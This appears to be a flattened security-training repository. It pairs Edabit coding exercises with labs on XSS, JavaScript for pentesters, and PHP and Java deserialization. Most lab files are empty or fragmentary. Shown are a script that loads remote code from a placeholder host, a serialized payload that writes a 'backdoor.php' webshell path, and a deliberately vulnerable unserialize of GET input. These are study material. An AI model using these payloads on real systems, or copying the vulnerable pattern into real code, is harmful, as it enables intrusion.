├── From SQL Injection to Shell
├── shell.php3
└── README.md
├── Edabit
├── javascript
│ ├── nine.js
│ ├── ten.js
│ ├── nineteen.js
│ ├── sixteen.js
│ ├── fourteen.js
│ ├── three.js
│ ├── eight.js
│ ├── twelve.js
│ ├── one.js
│ ├── twenty-six.js
│ ├── eighteen.js
│ ├── seven.js
│ ├── twenty-one.js
│ ├── five.js
│ ├── fifteen.js
│ ├── four.js
│ ├── six.js
│ ├── twenty.js
│ ├── eleven.js
│ ├── seventeen.js
│ ├── two.js
│ └── thirteen.js
├── php
│ ├── fourteen.php
│ ├── twenty.php
│ ├── six.php
│ ├── twenty-two.php
│ ├── eighteen.php
│ ├── twelve.php
│ ├── thirteen.php
│ ├── nine.php
│ ├── thirty-one.php
│ ├── thirty-seven.php
│ ├── twenty-one.php
│ ├── forty.php
│ ├── thirty-three.php
│ ├── fifteen.php
│ ├── thirty-six.php
│ ├── twenty-nine.php
│ ├── seventeen.php
│ ├── four.php
│ ├── twenty-six.php
│ ├── twenty-three.php
│ ├── thirty-eight.php
│ ├── three.php
│ ├── eight.php
│ ├── twenty-eight.php
│ ├── eleven.php
│ ├── two.php
│ ├── thirty-two.php
│ ├── sixteen.php
│ ├── seven.php
│ ├── thirty.php
│ ├── one.php
│ ├── twenty-four.php
│ ├── forty-one.php
│ ├── thirty-nine.php
│ ├── twenty-five.php
│ ├── five.php
│ ├── nineteen.php
│ ├── ten.php
│ ├── thirty-five.php
│ ├── thirty-four.php
│ └── twenty-seven.php
├── java
│ ├── two.java
│ ├── three.java
│ ├── fifteen.java
│ ├── fourteen.java
│ ├── eight.java
│ ├── six.java
│ ├── one.java
│ ├── twenty-one.java
│ ├── twenty-two.java
│ ├── ten.java
│ ├── four.java
│ ├── nine.java
│ ├── eleven.java
│ ├── seven.java
│ ├── thirty-four.java
│ ├── eighteen.java
│ ├── twenty-six.java
│ ├── five.java
│ ├── twelve.java
│ ├── twenty.java
│ ├── twenty-three.java
│ ├── twenty-seven.java
│ ├── twenty-five.java
│ ├── seventeen.java
│ ├── nineteen.java
│ ├── thirteen.java
│ ├── thirty-two.java
│ ├── thirty-one.java
│ ├── twenty-four.java
│ ├── thirty-three.java
│ ├── twenty-eight.java
│ ├── sixteen.java
│ ├── thirty.java
│ └── twenty-nine.java
└── README.md
├── \dev\random: Pipe
├── example.php
├── pipe.jpg
├── php_object_injection.webm
├── payload-gen.php
├── weaponized_exploit
│ ├── custom_class.php
│ └── exploit.php
├── log.php
└── README.md
├── XSS and MySQL
├── sploit.webm
├── cJack.js
├── README.md
└── exploit.js
├── JavaScript For Pentesters
├── encoder.py
├── Leveraging-JavaScript
│ ├── task9-remote_load.js
│ ├── task11-replace_banner.js
│ ├── task10-download_restrictions.js
│ ├── task6-cap_clicks.js
│ ├── task12-auto_complete_grab.js
│ ├── task8-event_listener.js
│ ├── task7-keylogger.js
│ └── task5-rm_field.js
├── README.md
├── Modifying-HTML
│ ├── task1-modify.js
│ ├── task2-change_links.js
│ ├── task3-redirect_input.js
│ └── task4-new_field.js
├── XMLHttpRequests
│ ├── task14-xml_fetch.js
│ ├── task15-data_exfil.js
│ ├── task16-csrf_grab.js
│ ├── task13_xml_post.js
│ └── task17-csrf_token_jack.js
└── Parsing
│ ├── task18-html_parsing.js
│ ├── task20-multi_level_json.js
│ ├── task21-multi_level_xml.js
│ └── task19-multi_level_parsing.js
├── Practicing Java Deserialization Exploits
├── client
│ ├── rawcnt.bin
│ └── client_traffic.txt
├── server
│ ├── rawser.bin
│ └── server_traffic.txt
├── vuln_traffic.pcapng
├── java-deserialization.webm
├── convert.py
├── README.md
├── decipher.txt
└── exploit.py
├── Understanding PHP Object Injection
├── injection2.php
├── injection.php
├── example_usage_log.php
├── README.md
├── class.php
├── index1.php
├── class-deserialize.php
├── class-serialize.php
├── logfile.php
├── index2.php
├── class-magic-examples.php
└── ser-magic-funcs.php
├── Understanding Java Deserialization
├── vuln_example2
│ └── src
│ │ ├── Program.java
│ │ ├── LogFile.java
│ │ └── Utils.java
├── README.md
├── vuln_example
│ └── src
│ │ ├── Program.java
│ │ ├── LogFile.java
│ │ └── Utils.java
├── deser_example.java
├── ser_example.java
└── reversed-bytes.c
├── Simple Object Oriented Language Examples
├── README.md
├── class-example.py
├── class-example.js
├── class-example.java
└── class-example.php
└── README.md
/From SQL Injection to Shell/shell.php3:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Edabit/javascript/nine.js:
--------------------------------------------------------------------------------
/**
 * Return the given value incremented by one.
 *
 * @param {number} num - Value to increment.
 * @returns {number} The incremented value.
 */
function addition(num) {
  // Post-increment then return: same numeric coercion as the prefix form.
  num++;
  return num;
}
4 |
--------------------------------------------------------------------------------
/\dev\random: Pipe/example.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Edabit/javascript/ten.js:
--------------------------------------------------------------------------------
/**
 * Report how many arguments the caller passed.
 *
 * @returns {number} Number of arguments supplied to this call.
 */
function numArgs() {
  // `arguments` is only available in non-arrow functions.
  const count = arguments.length;
  return count;
}
4 |
--------------------------------------------------------------------------------
/Edabit/javascript/nineteen.js:
--------------------------------------------------------------------------------
/**
 * Locate the first position of `str` inside `arr`.
 *
 * @param {Array|string} arr - Collection searched with indexOf.
 * @param {*} str - Value to look for.
 * @returns {number} Zero-based index, or -1 when the value is absent.
 */
function find_index(arr, str) {
  const position = arr.indexOf(str);
  return position;
}
4 |
--------------------------------------------------------------------------------
/Edabit/javascript/sixteen.js:
--------------------------------------------------------------------------------
/**
 * Build a string made of `num` dash characters.
 *
 * @param {number} num - How many dashes to produce.
 * @returns {string} A run of "-" repeated `num` times.
 */
function Go(num) {
  return "-".repeat(num);
}
5 |
--------------------------------------------------------------------------------
/XSS and MySQL/sploit.webm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/whoisflynn/AWAE-PREP/HEAD/XSS and MySQL/sploit.webm
--------------------------------------------------------------------------------
/\dev\random: Pipe/pipe.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/whoisflynn/AWAE-PREP/HEAD/\dev\random: Pipe/pipe.jpg
--------------------------------------------------------------------------------
/Edabit/javascript/fourteen.js:
--------------------------------------------------------------------------------
/**
 * Raise `num` to the power `exp`.
 *
 * @param {number} num - Base.
 * @param {number} exp - Exponent.
 * @returns {number} Result of Math.pow(num, exp).
 */
function calculateExponent(num, exp) {
  const power = Math.pow(num, exp);
  return power;
}
4 |
--------------------------------------------------------------------------------
/Edabit/javascript/three.js:
--------------------------------------------------------------------------------
1 |
8 |
--------------------------------------------------------------------------------
/XSS and MySQL/cJack.js:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Edabit/javascript/eight.js:
--------------------------------------------------------------------------------
/**
 * Tell whether two strings have the same length.
 *
 * @param {string} str1 - First value; only its `length` is read.
 * @param {string} str2 - Second value; only its `length` is read.
 * @returns {boolean} true when both lengths compare equal.
 */
function comp(str1, str2) {
  const sameLength = str1.length == str2.length;
  return sameLength;
}
6 |
--------------------------------------------------------------------------------
/Edabit/javascript/twelve.js:
--------------------------------------------------------------------------------
/**
 * Count the characters in the string form of `num`.
 *
 * Every character of `num.toString()` is counted, so a minus sign or a
 * decimal point is included in the result.
 *
 * @param {number} num - Value to measure.
 * @returns {number} Length of the value's string representation.
 */
function findDigitAmount(num) {
  return num.toString().length;
}
5 |
--------------------------------------------------------------------------------
/\dev\random: Pipe/php_object_injection.webm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/whoisflynn/AWAE-PREP/HEAD/\dev\random: Pipe/php_object_injection.webm
--------------------------------------------------------------------------------
/JavaScript For Pentesters/encoder.py:
--------------------------------------------------------------------------------
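#!/usr/bin/python
"""URL-encode everything read from standard input and print the result.

The text is passed through ``quote_plus``, so spaces become ``+`` and
reserved characters become ``%XX`` escapes.  The original script used the
Python 2 ``print`` statement and ``urllib.quote_plus``, neither of which
exists on Python 3; this version runs on both.
"""
import sys

try:  # Python 3 location of quote_plus
    from urllib.parse import quote_plus
except ImportError:  # Python 2 fallback
    from urllib import quote_plus

# read() returns the same text as joining readlines(); the trailing newline
# matches what the print statement emitted.
sys.stdout.write(quote_plus(sys.stdin.read()) + "\n")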
6 |
--------------------------------------------------------------------------------
/Edabit/javascript/one.js:
--------------------------------------------------------------------------------
1 |
8 |
--------------------------------------------------------------------------------
/Edabit/javascript/twenty-six.js:
--------------------------------------------------------------------------------
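/**
 * Check that a string is a phone number formatted as "(123) 456-7890".
 *
 * The original body called PHP's preg_match, which is not defined in
 * JavaScript, so calling it from this .js file raised a ReferenceError.
 * The same pattern is applied here with a native regular expression.
 *
 * @param {string} $str - Candidate phone number.
 * @returns {boolean} true only when the whole string matches the format.
 */
function isValidPhoneNumber($str) {
  // Anchored at both ends so extra leading or trailing text is rejected.
  return /^\(\d{3}\) \d{3}-\d{4}$/.test($str);
}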
4 |
--------------------------------------------------------------------------------
/Edabit/javascript/eighteen.js:
--------------------------------------------------------------------------------
/**
 * Multiply every element of `arr` by the array's length.
 *
 * The array is modified in place and the same array object is returned.
 *
 * @param {number[]} arr - Values to scale.
 * @returns {number[]} The input array after scaling.
 */
function MultiplyByLength(arr) {
  const size = arr.length;
  let idx = 0;
  while (idx < size) {
    arr[idx] *= size;
    idx += 1;
  }
  return arr;
}
6 |
--------------------------------------------------------------------------------
/Edabit/javascript/seven.js:
--------------------------------------------------------------------------------
/**
 * Compute x! by repeated multiplication.
 *
 * Returns 1 when `x` is 0 and also when `x >= 0` is false (negative input).
 *
 * @param {number} x - Value whose factorial is wanted.
 * @returns {number} Product of the integers 1..x.
 */
function factorial(x) {
  let product = 1;
  if (!(x >= 0)) {
    return product;
  }
  const limit = x + 1;
  for (let step = 1; step < limit; step += 1) {
    product *= step;
  }
  return product;
}
8 |
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/client/rawcnt.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/whoisflynn/AWAE-PREP/HEAD/Practicing Java Deserialization Exploits/client/rawcnt.bin
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/server/rawser.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/whoisflynn/AWAE-PREP/HEAD/Practicing Java Deserialization Exploits/server/rawser.bin
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/vuln_traffic.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/whoisflynn/AWAE-PREP/HEAD/Practicing Java Deserialization Exploits/vuln_traffic.pcapng
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Leveraging-JavaScript/task9-remote_load.js:
--------------------------------------------------------------------------------
1 | // http://pentesteracademylab.appspot.com/lab/webapp/jfp/9
2 |
3 |
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/java-deserialization.webm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/whoisflynn/AWAE-PREP/HEAD/Practicing Java Deserialization Exploits/java-deserialization.webm
--------------------------------------------------------------------------------
/Edabit/javascript/twenty-one.js:
--------------------------------------------------------------------------------
/**
 * Compute the factorial of `int` iteratively.
 *
 * Returns 1 for 0 and for any input where `int >= 0` is false.
 *
 * @param {number} int - Value whose factorial is wanted.
 * @returns {number} Product of the integers 1..int.
 */
function factorial(int) {
  let result = 1;
  if (int >= 0) {
    let factor = 1;
    while (factor < (int + 1)) {
      result *= factor;
      factor++;
    }
  }
  return result;
}
8 |
--------------------------------------------------------------------------------
/Edabit/php/fourteen.php:
--------------------------------------------------------------------------------
1 |
10 |
--------------------------------------------------------------------------------
/Edabit/php/twenty.php:
--------------------------------------------------------------------------------
1 |
11 |
--------------------------------------------------------------------------------
/Edabit/javascript/five.js:
--------------------------------------------------------------------------------
1 |
8 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/injection2.php:
--------------------------------------------------------------------------------
1 | filename = 'x';
7 |
8 | echo serialize($obj);
9 |
10 | ?>
11 |
--------------------------------------------------------------------------------
/Edabit/php/six.php:
--------------------------------------------------------------------------------
1 |
11 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-two.php:
--------------------------------------------------------------------------------
1 |
11 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/README.md:
--------------------------------------------------------------------------------
1 | # Javascript for Pentesters
2 |
3 | A simple 2-hour course that covers using JavaScript for pentesting.
4 |
5 | ## Links
6 |
7 | - https://www.pentesteracademy.com/course?id=11
8 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/injection.php:
--------------------------------------------------------------------------------
1 | filename = '.htaccess';
7 |
8 | echo serialize($obj)."\n";
9 |
10 | ?>
11 |
--------------------------------------------------------------------------------
/Edabit/php/eighteen.php:
--------------------------------------------------------------------------------
1 |
13 |
--------------------------------------------------------------------------------
/Edabit/php/twelve.php:
--------------------------------------------------------------------------------
1 |
2 |
12 |
--------------------------------------------------------------------------------
/Edabit/php/thirteen.php:
--------------------------------------------------------------------------------
1 |
12 |
--------------------------------------------------------------------------------
/Edabit/javascript/fifteen.js:
--------------------------------------------------------------------------------
/**
 * Count how many times `myChar` appears in `str`.
 *
 * @param {string} myChar - Character to look for.
 * @param {string} str - Text to scan.
 * @returns {number} Number of positions in `str` equal to `myChar`.
 */
function charCount(myChar, str) {
  let matches = 0;
  // split('') yields one entry per position of the string.
  for (const ch of str.split('')) {
    if (ch == myChar) {
      matches += 1;
    }
  }
  return matches;
}
9 |
--------------------------------------------------------------------------------
/Edabit/javascript/four.js:
--------------------------------------------------------------------------------
1 |
12 |
--------------------------------------------------------------------------------
/Edabit/javascript/six.js:
--------------------------------------------------------------------------------
1 |
11 |
--------------------------------------------------------------------------------
/Edabit/php/nine.php:
--------------------------------------------------------------------------------
1 |
12 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-one.php:
--------------------------------------------------------------------------------
1 |
11 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-seven.php:
--------------------------------------------------------------------------------
1 |
14 |
--------------------------------------------------------------------------------
/Edabit/javascript/twenty.js:
--------------------------------------------------------------------------------
/**
 * Negate a boolean.
 *
 * @param {boolean} bool - Value to invert.
 * @returns {boolean|string} The opposite boolean, or the string
 *   "boolean expected" when the argument is not of type boolean.
 */
function reverse(bool) {
  // Guard clause: anything that is not a primitive boolean is rejected.
  if (typeof bool != 'boolean') {
    return "boolean expected";
  }
  return !bool;
}
12 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-one.php:
--------------------------------------------------------------------------------
1 |
13 |
--------------------------------------------------------------------------------
/Edabit/javascript/eleven.js:
--------------------------------------------------------------------------------
/**
 * Tell whether the arithmetic mean of `arr` is a whole number.
 *
 * An empty array yields false because 0 / 0 is NaN.
 *
 * @param {number[]} arr - Values to average.
 * @returns {boolean} true when the mean has no fractional part.
 */
function isAvgWhole(arr) {
  let total = 0;
  for (const value of arr) {
    total += value;
  }
  const mean = total / arr.length;
  return (mean % 1) == 0;
}
11 |
--------------------------------------------------------------------------------
/Edabit/php/forty.php:
--------------------------------------------------------------------------------
1 |
14 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-three.php:
--------------------------------------------------------------------------------
1 |
12 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Modifying-HTML/task1-modify.js:
--------------------------------------------------------------------------------
1 |
6 |
--------------------------------------------------------------------------------
/Edabit/php/fifteen.php:
--------------------------------------------------------------------------------
1 |
12 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-six.php:
--------------------------------------------------------------------------------
1 |
6 | return preg_replace('/[^A-Za-z0-9\-_\ ]/', '', $str);
7 | }
8 |
9 | echo removeSpecialCharacters("hello$ $%#world")."\n";
10 |
11 | ?>
12 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/example_usage_log.php:
--------------------------------------------------------------------------------
1 | filename = "somefile.log";
8 | $obj->LogData("test");
9 |
10 | // destructor will be called and file will be deleted
11 |
12 | ?>
13 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-nine.php:
--------------------------------------------------------------------------------
1 |
14 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Leveraging-JavaScript/task11-replace_banner.js:
--------------------------------------------------------------------------------
1 |
5 |
--------------------------------------------------------------------------------
/Edabit/php/seventeen.php:
--------------------------------------------------------------------------------
1 |
16 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Leveraging-JavaScript/task10-download_restrictions.js:
--------------------------------------------------------------------------------
// http://pentesteracademylab.appspot.com/lab/webapp/jfp/10
// Lab exercise: build a <script> element whose src points at an externally
// hosted file and attach it to the page body so the browser fetches and runs
// it. X.X.X.X is the author's placeholder for the lab host.
// Defensive note: a Content-Security-Policy with a restrictive script-src
// keeps the browser from loading scripts from origins that are not allowed.
var newtag = Object.assign(document.createElement("script"), {
  type: "text/javascript",
  src: "http://X.X.X.X/test.js",
});
document.body.appendChild(newtag);
6 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Leveraging-JavaScript/task6-cap_clicks.js:
--------------------------------------------------------------------------------
1 |
9 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Leveraging-JavaScript/task12-auto_complete_grab.js:
--------------------------------------------------------------------------------
1 |
8 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Leveraging-JavaScript/task8-event_listener.js:
--------------------------------------------------------------------------------
1 |
10 |
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/client/client_traffic.txt:
--------------------------------------------------------------------------------
1 | aced00057704f000baaa77020101770900077765747730726b737200146e622e64657365722e4861736852657175657374e52ce9a92ac1f9910200024c000a64617461546f486173687400124c6a6176612f6c616e672f537472696e673b4c00077468654861736871007e0001787074000a695f6c696b655f706965740000
2 |
--------------------------------------------------------------------------------
/Edabit/php/four.php:
--------------------------------------------------------------------------------
1 |
15 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-six.php:
--------------------------------------------------------------------------------
1 | = 1)
9 | for ($i = 0; $i < $oln; $i++)
10 | $arr[$i] = '#';
11 | return implode('', $arr);
12 | }
13 |
14 | print_r(maskify("4556364607935616"));
15 |
16 | ?>
17 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Leveraging-JavaScript/task7-keylogger.js:
--------------------------------------------------------------------------------
1 |
10 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-three.php:
--------------------------------------------------------------------------------
1 |
17 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Modifying-HTML/task2-change_links.js:
--------------------------------------------------------------------------------
1 |
11 |
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/server/server_traffic.txt:
--------------------------------------------------------------------------------
1 | aced00057704f000baaa77020101737200146e622e64657365722e4861736852657175657374e52ce9a92ac1f9910200024c000a64617461546f486173687400124c6a6176612f6c616e672f537472696e673b4c00077468654861736871007e0001787074000a695f6c696b655f7069657400203238373831393632623734306235303662313032653563616637363436653138
2 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/vuln_example2/src/Program.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 |
/**
 * Entry point of the second example: hands the file "Example.ser" to
 * Utils.DeserializeFromFile.
 *
 * NOTE(review): Utils and LogFile are not shown here. If the helper reads the
 * file through ObjectInputStream, whoever can write Example.ser decides which
 * classes' deserialization hooks run. For data that is not trusted, restrict
 * the accepted classes with an allow-list (java.io.ObjectInputFilter) or use
 * a data-only format instead of native serialization.
 */
public class Program
{
    public static void main(String[] args)
    {
        // Constructed but not used afterwards; kept so behavior is unchanged.
        LogFile unusedLog = new LogFile();
        final String serializedPath = "Example.ser";

        // Deserialize whatever object the file contains.
        Utils.DeserializeFromFile(serializedPath);
    }
}
14 |
--------------------------------------------------------------------------------
/Edabit/javascript/seventeen.js:
--------------------------------------------------------------------------------
/**
 * Map a month number to its English name.
 *
 * Index 0 holds the placeholder "NULL" so that 1 maps to January; any index
 * outside the table yields undefined.
 *
 * @param {number} num - Month number, 1 through 12.
 * @returns {string|undefined} The month name for `num`.
 */
function month_name(num) {
  const names = (
    "NULL January February March April May June " +
    "July August September October November December"
  ).split(" ");
  return names[num];
}
19 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-eight.php:
--------------------------------------------------------------------------------
1 |
16 |
--------------------------------------------------------------------------------
/Edabit/php/three.php:
--------------------------------------------------------------------------------
1 |
17 |
--------------------------------------------------------------------------------
/Edabit/php/eight.php:
--------------------------------------------------------------------------------
1 |
18 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/README.md:
--------------------------------------------------------------------------------
1 | # Understanding PHP Object Injection
2 |
3 | This tutorial is 10/10 at explaining PHP Object Injection. Be sure to walk through all of the code and simulate it.
4 |
5 | ## Links
6 |
7 | - https://securitycafe.ro/2015/01/05/understanding-php-object-injection/
8 | - https://nitesculucian.github.io/2018/10/05/php-object-injection-cheat-sheet/
9 |
--------------------------------------------------------------------------------
/\dev\random: Pipe/payload-gen.php:
--------------------------------------------------------------------------------
1 | filename = "/var/www/html/images/backdoor.php";
14 | $obj->data = '';
15 |
16 | echo serialize($obj)."\n";
17 |
18 | ?>
19 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-eight.php:
--------------------------------------------------------------------------------
1 |
21 |
--------------------------------------------------------------------------------
/Edabit/php/eleven.php:
--------------------------------------------------------------------------------
1 |
17 |
--------------------------------------------------------------------------------
/Simple Object Oriented Language Examples/README.md:
--------------------------------------------------------------------------------
1 | # Simple Object Oriented Language Examples
2 |
3 | I went ahead and created a simple class in Java, JavaScript, PHP, and Python. These examples are great if you need a reference or refresher for calls when auditing or reviewing source code.
4 |
5 | - class-example.java
6 | - class-example.js
7 | - class-example.php
8 | - class-example.py
9 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/class.php:
--------------------------------------------------------------------------------
1 | variable;
10 | }
11 | }
12 |
13 | $object = new TestClass(); // create an object
14 | $object->PrintVariable(); // call a method
15 |
16 | ?>
17 |
--------------------------------------------------------------------------------
/Edabit/java/two.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes two integers as arguments and return their sum.
4 |
5 | */
6 |
public class Program
{
    /**
     * Adds two integers.
     *
     * @param a first addend
     * @param b second addend
     * @return a + b using int arithmetic
     */
    public static int SumOfTwoNumbers(int a, int b)
    {
        return Integer.sum(a, b);
    }

    /** Prints the sum of 3 and 2 followed by a newline. */
    public static void main(String[] args)
    {
        int total = SumOfTwoNumbers(3, 2);
        System.out.printf("%s\n", total);
    }
}
19 |
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/convert.py:
--------------------------------------------------------------------------------
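"""Write the hex-encoded client traffic to rawcnt.bin as raw bytes."""
import binascii

# Same hex string as client/client_traffic.txt. The leading "aced0005" is the
# magic number and version of a Java object-serialization stream.
byte_str = (
    "aced00057704f000baaa77020101770900077765747730726b737200146e622e64657365722e4861736852657175657374e52ce9a92ac1f9910200024c000a64617461546f486173687400124c6a6176612f6c616e672f537472696e673b4c00077468654861736871007e0001787074000a695f6c696b655f706965740000"
)

# str.decode('hex') exists only on Python 2; unhexlify works on 2 and 3.
# The with-block closes the file even if the write fails.
with open("rawcnt.bin", "wb") as out_file:
    out_file.write(binascii.unhexlify(byte_str))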
6 |
--------------------------------------------------------------------------------
/Edabit/java/three.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that accepts an array and returns the last item in the array.
4 |
5 | */
6 |
public class Program
{
    /**
     * Returns the final element of an int array.
     *
     * @param nums array to read; an empty array raises
     *             ArrayIndexOutOfBoundsException
     * @return the element at index nums.length - 1
     */
    public static int getLastItem(int[] nums)
    {
        final int lastIndex = nums.length - 1;
        return nums[lastIndex];
    }

    /** Prints the last item of {1, 2, 3}. */
    public static void main(String[] args)
    {
        int[] sample = new int[]{1, 2, 3};
        System.out.printf("%d\n", getLastItem(sample));
    }
}
19 |
--------------------------------------------------------------------------------
/Edabit/php/two.php:
--------------------------------------------------------------------------------
1 |
16 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/index1.php:
--------------------------------------------------------------------------------
1 | name." is ".$this->age." years old.\n";
14 | }
15 | }
16 |
17 | $user = unserialize($_GET['serialized_user']);
18 |
19 | ?>
20 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-two.php:
--------------------------------------------------------------------------------
1 |
21 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/README.md:
--------------------------------------------------------------------------------
1 | # Understanding Java Deserialization
2 |
3 | This tutorial covers Java deserialization exploitation. It's excellent at showing the concept, and you'll quickly find that it's very similar to PHP Object Injection; the only differences are that Java is compiled and the structure of the serialized objects.
4 |
5 | ## Links
6 |
7 | - https://nytrosecurity.com/2018/05/30/understanding-java-deserialization/
8 |
--------------------------------------------------------------------------------
/Edabit/php/sixteen.php:
--------------------------------------------------------------------------------
1 |
20 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/class-deserialize.php:
--------------------------------------------------------------------------------
1 | name." is ".$this->age." years old.";
11 | }
12 | }
13 | // Create a user object and call PrintData()
14 | $u = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:6:"Milton";}');
15 | $u->PrintData();
16 |
17 | ?>
18 |
--------------------------------------------------------------------------------
/Edabit/php/seven.php:
--------------------------------------------------------------------------------
1 |
21 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/vuln_example/src/Program.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 |
/**
 * Entry point of the first example: fills in a LogFile object and writes it
 * to "Log.ser" through Utils.SerializeToFile.
 *
 * NOTE(review): LogFile and Utils are defined in other files and are not
 * shown here.
 */
public class Program
{
    public static void main(String[] args)
    {
        LogFile logEntry = new LogFile();
        // Instance is never used; the helper is called statically below.
        Utils unusedHelper = new Utils();
        final String outputPath = "Log.ser";

        // State that ends up inside the serialized stream.
        logEntry.filename = "wetw0rk.log";
        logEntry.filecontent = "No actions logged";

        Utils.SerializeToFile(logEntry, outputPath);
    }
}
17 |
--------------------------------------------------------------------------------
/Edabit/php/thirty.php:
--------------------------------------------------------------------------------
1 |
26 |
--------------------------------------------------------------------------------
/Edabit/java/fifteen.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes a string and returns the word count.
4 | The string will be a sentence.
5 |
6 | */
7 |
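public class Program
{
    /**
     * Counts the whitespace-separated words in a sentence.
     *
     * Splitting on a single space reported one word for an empty string and
     * counted empty tokens produced by leading or repeated spaces. The input
     * is now trimmed and split on runs of whitespace.
     *
     * @param s sentence to inspect; null is treated as containing no words
     * @return number of words, 0 for null, empty or all-whitespace input
     */
    public static int countWords(String s)
    {
        if (s == null)
        {
            return 0;
        }

        String trimmed = s.trim();
        if (trimmed.isEmpty())
        {
            return 0;
        }

        // "\\s+" collapses consecutive spaces or tabs into one separator.
        return trimmed.split("\\s+").length;
    }

    /** Prints the word count of a sample sentence. */
    public static void main(String[] args)
    {
        System.out.printf("%d\n", countWords("Just an example here move along"));
    }
}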
20 |
--------------------------------------------------------------------------------
/Edabit/java/fourteen.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes a string as its argument
4 | and returns the string in reversed order.
5 |
6 | */
7 |
public class Program
{
    /**
     * Returns the characters of a string in reverse order.
     *
     * @param str text to reverse
     * @return a new string with the characters reversed
     */
    public static String reverse(final String str)
    {
        StringBuilder reversed = new StringBuilder(str);
        reversed.reverse();
        return reversed.toString();
    }

    /** Prints the reversal of "ls". */
    public static void main(String[] args)
    {
        String flipped = reverse("ls");
        System.out.printf("%s\n", flipped);
    }
}
20 |
--------------------------------------------------------------------------------
/Edabit/php/one.php:
--------------------------------------------------------------------------------
1 |
23 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/XMLHttpRequests/task14-xml_fetch.js:
--------------------------------------------------------------------------------
1 |
14 |
--------------------------------------------------------------------------------
/Edabit/java/eight.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a function that takes a two strings and returns true if
4 | the first argument ends with the second argument; otherwise
5 | return false.
6 |
7 | */
8 |
public class Program
{
    /**
     * Tells whether one string ends with another.
     *
     * @param str1 text whose tail is checked
     * @param str2 suffix to look for
     * @return true when str1 ends with str2, false otherwise
     */
    public static boolean checkEnding(String str1, String str2)
    {
        final boolean hasSuffix = str1.endsWith(str2);
        return hasSuffix;
    }

    /** Prints whether "abc" ends with "bc". */
    public static void main(String[] args)
    {
        boolean outcome = checkEnding("abc", "bc");
        System.out.printf("%b\n", outcome);
    }
}
21 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-four.php:
--------------------------------------------------------------------------------
1 | = 5 && $arr[$i] != "lassen")
12 | $arr[$i] = strrev($arr[$i]);
13 | return implode(' ', $arr);
14 | }
15 |
16 | $example = "sich die Wurst vom Brot nehem lassen";
17 |
18 | echo sprintf("%s\n", reverse($example));
19 |
20 | ?>
21 |
--------------------------------------------------------------------------------
/Edabit/java/six.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an array of integers and returns the smallest number in the set.
4 |
5 | */
6 |
7 | import static java.util.Arrays.stream;
8 |
public class Program
{
    /**
     * Return the smallest value in an array of integers.
     *
     * @param args the values to scan
     * @return the minimum element
     * @throws java.util.NoSuchElementException if the array is empty
     */
    public static int findSmallestInt(int[] args)
    {
        // reduce() gives an empty OptionalInt for an empty array, so getAsInt()
        // raises NoSuchElementException in that case, as min() did.
        return stream(args).reduce(Math::min).getAsInt();
    }

    public static void main(String[] args)
    {
        final int[] sample = new int[]{34,15,88,2};
        System.out.printf("%s\n", findSmallestInt(sample));
    }
}
21 |
--------------------------------------------------------------------------------
/Edabit/javascript/two.js:
--------------------------------------------------------------------------------
1 |
19 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/XMLHttpRequests/task15-data_exfil.js:
--------------------------------------------------------------------------------
1 |
